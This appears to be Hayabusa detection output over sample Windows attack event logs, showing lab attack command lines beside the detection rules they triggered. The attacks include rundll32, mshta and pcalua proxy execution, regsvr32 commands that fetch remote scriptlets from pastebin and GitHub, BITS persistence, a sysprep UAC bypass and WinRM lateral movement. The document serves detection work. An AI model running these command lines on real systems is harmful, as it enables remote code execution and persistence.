+09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:37.078 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:59.743 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.523 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:01.383 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:55:56.626 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:12.652 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:58:39.850 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 22:58:54.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 23:18:03.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 23:18:09.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-13 02:01:43.391 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:50.781 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe : Path: C:\Windows\System32\pcalua.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:51.007 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Code Execution via Pcwutl.dll,,rules/sigma/process_creation/win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:20:01.980 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:31.183 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.443 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Suspicious ftp.exe,,rules/sigma/process_creation/win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.458 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\system32\calc.exe : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 03:04:50.121 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: backdoor : URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,informational,Process Creation,"Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.780 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:48:52.219 +09:00,IEWIN7,1,informational,Process Creation,"Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll : Path: C:\ProgramData\jabber.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx +2019-05-13 03:48:52.766 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx +2019-05-13 23:50:59.389 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: hola : URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx +2019-05-14 03:02:49.160 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mobsync.exe -Embedding : Path: C:\Windows\System32\mobsync.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.895 +09:00,IEWIN7,1,informational,Process Creation,Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: /c notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:05:18.692 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mshta.exe -Embedding : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Spwaned by SVCHOST,,rules/sigma/process_creation/win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.143 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 288 03573528 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.453 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.470 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 312 0197CDB0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.814 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.831 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,Hijack Legit RDP Session to Move Laterally,,rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Office Security Settings Changed,,rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx +2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\WinrsHost.exe -Embedding : Path: C:\Windows\System32\winrshost.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /C ipconfig : Path: C:\Windows\System32\cmd.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\WinrsHost.exe 